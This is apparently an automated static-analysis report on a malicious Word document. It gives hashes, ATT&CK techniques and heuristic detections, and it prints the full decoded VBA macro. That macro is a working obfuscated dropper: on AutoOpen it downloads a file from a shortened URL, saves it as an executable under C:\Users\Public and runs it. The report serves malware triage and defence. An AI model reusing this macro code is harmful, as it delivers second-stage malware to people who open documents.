Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fa7e0a35dc579756…

MALICIOUS

Office (OLE)

145.0 KB Created: 2020-08-08 20:20:00 Authoring application: Microsoft Office Word First seen: 2020-09-15
MD5: 52e74e283b5eb5379b7e1e449ed62843 SHA-1: 559d2020fd3001dd54aea1e1d63ab0d1baac7ecd SHA-256: fa7e0a35dc579756e574a23f1c780af6b7ab12210e98036370bf45bc09bc5015
252 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a Word document containing a heavily obfuscated VBA macro. The macro's AutoOpen subroutine calls a function that attempts to download a file from the URL 'http://rebrand.ly/ohxnqak' and save it as 'C:\Users\Public\crscss.exe'. This indicates a downloader or droppper functionality, aiming to execute a second-stage payload.

Heuristics 9

  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
        Shell "C:\Users\Public\crscss.exe"
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
           objStream.Write objReq.ResponseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set objReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
    • http://rebrand.ly/ohxnqakReferenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6840 bytes
SHA-256: 5b8f04e8b7b105d9f98d81dbc3daf9a186b954c278eb7ef74b3dba9d9684f1fb
Detection
ClamAV: No threats found
Obfuscation or payload: likely
159 of 219 identifiers look randomly generated (e.g. 'SliFpzFBNefACLjQtJqwYMsoonsdVdHiTknqiGk') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()
GoTo TmjGqAGCOf:
yOelnwTOsubh:
xfTofUjtccOPqzLoH = "Kdpd"
GoTo BDMkRvKrxQZ:
VuMmMYRkSqakq:
yajvQrVuMmMYRkSqa = "qmy"
GoTo yOelnwTOsubh
PpEwhOQlNSgdLZyyajvQ:
QnIiaVhyNjQgDyceKeks = "MVQ"
GoTo VuMmMYRkSqakq
ekshMVQUaxDKpCBRV:
tNhbQwFGEJunuZm = "BEHz"
GoTo PpEwhOQlNSgdLZyyajvQ
wHBTQnIiaVhyNjQgDyce:
jUlorjHlPzvkEvmzJss = "RtP"
GoTo ekshMVQUaxDKpCBRV
CPavIwiJgfGoFrv:

GoTo wHBTQnIiaVhyNjQgDyce
unuZmlBEHzZngQyAU:
Call XXZZSSOOOEHUEUIEGIUERFIUGEFEFBFYFBIUWR
GoTo CPavIwiJgfGoFrv
iLbtNhbQwFGE:
OfgBDMkRvKrxQZOupp = "teQe"
GoTo unuZmlBEHzZngQyAU
pbfFtqlCAQsQQSfiwSTd:
qYpbfFtqlCAQsQQ = "fiwSTdniL"
GoTo iLbtNhbQwFGE
vkEvmzJssgRtPcq:
ngQyAUxCPavIwiJgfGoF = "vVwHB"
GoTo pbfFtqlCAQsQQSfiwSTd
uppoteQeIjUlorjHlP:
axDKpCBRVYPpEwhOQlNS = "dLZ"
GoTo vkEvmzJssgRtPcq
TmjGqAGCOf:
elnwTOsubhAIxdZZYdN = "csSRiYbSrU"
GoTo uppoteQeIjUlorjHlP

BDMkRvKrxQZ:
End Sub
Sub XXZZSSOOOEHUEUIEGIUERFIUGEFEFBFYFBIUWR()
If vCENlg("http://rebrand.ly/ohxnqak", "C:\Users\Public\crscss.exe") = True Then
GoTo jdvsOkJOLQap:
faaZeOHOtTFVZcT:
jbAdHsncwnerBlk = "JlHTiPhSQx"
GoTo LUfaDSmFZTIoxywBm:
TrblrnzPQmoxUCfvciBJ:
rDgzfCUhURLecyis = "uGYYuv"
GoTo faaZeOHOtTFVZcT
OFTeMMzAbkwZsQvNZNKE:
iRcieqGVdfoLGkmSZsA = "VQQP"
GoTo TrblrnzPQmoxUCfvciBJ
EMdDCSILDcFkiPE:
OYvqTVCVckZENOM = "pvDhutJNP"
GoTo OFTeMMzAbkwZsQvNZNKE
jzOVYhEzdfLRltiNJJIM:
mfmQedtxzrQgYIqsMp = "HSnAo"
GoTo EMdDCSILDcFkiPE
wQxICUDbKUb:

GoTo jzOVYhEzdfLRltiNJJIM
VyDQNwJjjKSgHcG:
GoTo wQxICUDbKUb
KiovanmCGIAaphRz:
    Shell "C:\Users\Public\crscss.exe"
GoTo VyDQNwJjjKSgHcG
TGQojMOvOUdRxGH:
sOkJOLQapKLUfaDSm = "ZTIoxyw"
GoTo KiovanmCGIAaphRz
PrZqcgGhsmEBYtSKGRj:
BYQygxkoNoztLIf = "aRNaqF"
GoTo TGQojMOvOUdRxGH
lFinAKgthSu:
hwoZGIeGKZUDRqrRbn = "jNmEeEPJc"
GoTo PrZqcgGhsmEBYtSKGRj
tYkkzDGxQmfO:
FMTkKJaPSKjMrpQLgQNb = "TTHH"
GoTo lFinAKgthSu
jdvsOkJOLQap:
cJnCjpIQGmhiglVOVA = "Md"
GoTo tYkkzDGxQmfO

LUfaDSmFZTIoxywBm:
End If
End Sub
Public Function vCENlg(URL, path) As Boolean
 On Error GoTo errorhandle:
   Dim objReq
   Dim objStream
GoTo BhEQjQUOheA:
bjwYrQvMnMYRkTq:
TRQHOVmMMcSUMmOtrZNi = "PdoQVJJltF"
GoTo vAxIabwxGfLp:
ExhPRmOTheMaz:
yrbILgIMbQGTttTd = "RlQo"
GoTo bjwYrQvMnMYRkTq
xELqDCSVZQ:
PswKUpDqdDaZBiAmq = "qBvNKhDcT"
GoTo ExhPRmOTheMaz
eKfksiNQQV:
sZrdhGvsmEBYuSZ = "gkyTUfojMd"
GoTo xELqDCSVZQ
TPcsHdQaxs:
EOmSwLszRaPvqrpufZ = "JlV"
GoTo eKfksiNQQV
AmqPqBvNKhD:

GoTo TPcsHdQaxs
uPswKUpDqdDaZB:
   objReq.Send
GoTo AmqPqBvNKhD
DoipSgfvzCtSiaK:
   objReq.Open "GET", URL, False
GoTo uPswKUpDqdDaZB
ZcrMNYhcFUoHbVKqzA:
   Set objReq = CreateObject("MSXML2.ServerXMLHTTP.6.0")
GoTo DoipSgfvzCtSiaK
VaznlfxuQnLR:
lveeQQsANpIoMeqecVol = "rCIEPhi"
GoTo ZcrMNYhcFUoHbVKqzA
uEnmaMnJVkR:
qtkJmRBxlGwnBLuu = "TuQ"
GoTo VaznlfxuQnLR
jldCfJuqeyp:
PjdSyHHFKwpwbnnCG = "tSiaKs"
GoTo uEnmaMnJVkR
lrKSIojkinYQZCeO:
csHdQaxsVYEZemcHPQO = "ryFkwwLPSJ"
GoTo jldCfJuqeyp
BhEQjQUOheA:
gGRLeNkTekgsJYghqN = "moUbuCsY"
GoTo lrKSIojkinYQZCeO

vAxIabwxGfLp:
   If objReq.Status = 200 Then
GoTo VGNUlLLbRTLlNsqYMhY:
zvkEulzJssfRtPcqYp:
alrnyPemnxUPtubi = "BrQRS"
GoTo cnVUIIksEhAgDViVTN:
ZNtppnseQeIjUkorjHl:
izNjQgEzceKfksiNQQVb = "ELqDCS"
GoTo zvkEulzJssfRtPcqYp
pAGCNfgBDMkQuKrx:
cRxGGFJvovammCF = "AZohQyBV"
GoTo ZNtppnseQeIjUkorjHl
jtccOOqyLnHmKcodaTmj:
lpskImQAwlFvmAKttgSu = "drZqcgFur"
GoTo pAGCNfgBDMkQuKrx
QcNTbrSRiYbRrTzxfToe:
kuddPPrzMoInLdpebUnk = "qBHDOgh"
GoTo jtccOOqyLnHmKcodaTmj
wTOstahzHxdY:

GoTo QcNTbrSRiYbRrTzxfToe
MjSejfrIQf:
       vCENlg = True
GoTo wTOstahzHxdY
oQkPnFfFQK:
       Set objStream = Nothing
GoTo MjSejfrIQf
aHKfHLaVFSssS:
       objStream.Close
GoTo oQkPnFfFQK
dlbGOPNSqxEjvvKORIix:
       objStream.SaveToFile path, 2
GoTo aHKfHLaVFSssS
rGcPZwrUQD:
       objStream.Position = 0
GoTo dlbGOPNSqxEjvvKORIix
pOpAuMJgCbSO:
       objStream.Write objReq.ResponseBody
GoTo rGcPZwrUQD
rtOrvJToCpcCZYAhz:
       objStream.Type = 1
GoTo pOpAuMJgCbSO
oRfeuyBsRhZ:
       objStream.Open
GoTo rtOrvJToCpcCZYAhz
bqLMQgbETnHaUJpyzxCn:
       Set objStream = CreateObject("ADODB.Stream")
GoTo oRfeuyBsRhZ
LmIUkQiUZymkewtPmKQM:
tubiAIyeZaYdOUcsTSj = "cSsUAygUpf"
GoTo bqLMQgbETnHaUJpyzxCn
BdNeikcBeItpdxoftDml:
ENlRvLsyRaOuqqotfY = "Jk"
GoTo LmIUkQiUZymkewtPmKQM
eKoDkqJRHnijhmQP:
DAYtRYTgjxSUeoiL = "uO"
GoTo BdNeikcBeItpdxoftDml
dzjuzwHZavw:
CQbwJwjKhfHpGswVw = "BTQoJia"
GoTo eKoDkqJRHnijhmQP
VGNUlLLbRTLlNsqYMhY:
ZQpExhPRmOTheMazzbjw = "rQvMnMYRkT"
GoTo dzjuzwHZavw

cnVUIIksEhAgDViVTN:
   Else
GoTo GdyQdZloDZajtoRhz:
SliFpzFBNefACLjQtJqw:
BqKBsFPzymYzViwevh = "Lzxr"
GoTo niQCLMKPAtAfsrHLNFf:
bbNNpyKmGlJcnc:
RuNtQjvjgaspMwGMIU = "mHJS"
GoTo SliFpzFBNefACLjQtJqw
ZxbFDlaulcp:
qmxOdlmwTOstahzH = "dYZQcN"
GoTo bbNNpyKmGlJcnc
yAhnGODjffejTbiyZYoe:
JejrhMVVUawDKpC = "RUYPoD"
GoTo ZxbFDlaulcp
ZwgqwsEUkrtCa:
zYngPxAUxBPavIviJg = "Go"
GoTo yAhnGODjffejTbiyZYoe
pBdxcASsSeY:

GoTo ZwgqwsEUkrtCa
KCnUQrTZnjRfEF:
       vCENlg = False
GoTo pBdxcASsSeY
kqynScdbgDJRvIHYceV:
SfiwRTdnhKbtNhbQwFFE = "unuZmlBE"
GoTo KCnUQrTZnjRfEF
PogcoETpdmJEik:
rvUvGASPnIhaVhyMiV = "Dyb"
GoTo kqynScdbgDJRvIHYceV
lMuLxBcCNHaQ:
gOQlNSgdLZyyaivQq = "uLmLQQjSpZ"
GoTo PogcoETpdmJEik
mQEGbDIVhBOCoP:
brSRiYbRrTzxfToeUjtc = "VVw"
GoTo lMuLxBcCNHaQ
GdyQdZloDZajtoRhz:
YBQxDQfUAvvuzkdk = "pbruxpNrV"
GoTo mQEGbDIVhBOCoP

niQCLMKPAtAfsrHLNFf:
   End If
GoTo faCSlFZSIoxxwBmfmQed:
ByUrPURdgvQ:
kkQJlHTiPhSQwlicur = "kIOKQaoJL"
GoTo wzrPfYHqsMpuHR:
ePrNaoVnZdDrp:
qTyweSndTisbbNNpyKmG = "Jcnc"
GoTo ByUrPURdgvQ
cGhSjnphGjNytiCtkxIr:
kMRfcKYxxZhuVqUtKlL = "QjRoYjplwN"
GoTo ePrNaoVnZdDrp
CjpIQFlhhglV:
FnEquUuGARPmHgZ = "gxLiUfCxbc"
GoTo cGhSjnphGjNytiCtkxIr
syuGQYtvEcI:
spjByVrPVRehvQScmh = "asMgaPvE"
GoTo CjpIQFlhhglV
zeCUgURLeby:

GoTo syuGQYtvEcI
KjMrpQLgVMblTTGGiqD:
vCENlg = False
GoTo zeCUgURLeby
GVdfoLGkmSZsAUQQOTFLSkKJaP:
errorhandle:
GoTo KjMrpQLgVMblTTGGiqD
EPJcKhQcie:
   Exit Function
GoTo GVdfoLGkmSZsAUQQOTFLSkKJaP
dFKYUDQqqRanOjNmD:
   Set objReq = Nothing
GoTo EPJcKhQcie
utJMPHgvoZG:
OyujDukyIrreQsOb = "Qoae"
GoTo dFKYUDQqqRanOjNmD
YvqTUBVbjZENOMRpvC:
DItmtYlkADGyQmfOxz = "wBOZuHvhIf"
GoTo utJMPHgvoZG
ysKIfAZRNZqEa:
diqgLUVTZwCJoBAQTQO = "CvgN"
GoTo YvqTUBVbjZENOMRpvC
AoaBYQygxjnN:
kmvSNrtagzHwcYY = "bMSarRQhQa"
GoTo ysKIfAZRNZqEa
faCSlFZSIoxxwBmfmQed:
SliFpzFBNefACLjQtJqwYMsoonsdVdHiTknqiGk = "rncwmdr"
GoTo AoaBYQygxjnN

wzrPfYHqsMpuHR:
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.